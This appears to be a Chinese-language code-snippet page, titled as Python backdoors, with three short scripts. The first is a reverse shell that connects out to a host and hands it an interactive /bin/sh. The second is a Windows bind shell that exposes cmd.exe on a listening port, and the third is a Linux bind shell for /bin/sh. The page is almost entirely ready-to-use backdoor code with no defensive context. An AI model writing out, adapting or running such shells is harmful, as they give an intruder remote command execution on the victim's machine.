Python反向链接后门

1
2
3
4
5
6
7
8
import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM
s.connect((host,port))
os.dup2(s.fileno(),0) # 0代表系统的stdin
os.dup2(s.fileno(),1) # 1代表系统的stdout
os.dup2(s.fileno(),2) # 2代表系统的stderr
p=subprocess.call(["/bin/sh","-i"])

Python正向链接后门

  1. windows正向链接CmdShell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from socket import *
import subprocess
import os, threading

def send(talk, proc):
        import time
        while True:
                msg = proc.stdout.readline()
                talk.send(msg)
                
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',port))
server.listen(5)
talk, addr = server.accept()
print("connecting ", addr)
proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE,
                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                shell=True)
t = threading.Thread(target = send, args = (talk, proc))
t.setDaemon(True)
t.start()
while True:
    cmd=talk.recv(1024)
    proc.stdin.write(cmd)
    proc.stdin.flush()
server.close()
  1. linux版/bin/sh
1
2
3
4
5
6
7
8
9
10
11
from socket import *
import subprocess
import os, threading, sys

server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',port))
server.listen(5)
talk, addr = server.accept()
print("connecting ", addr)
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
                        stdout=talk, stderr=talk, shell=True)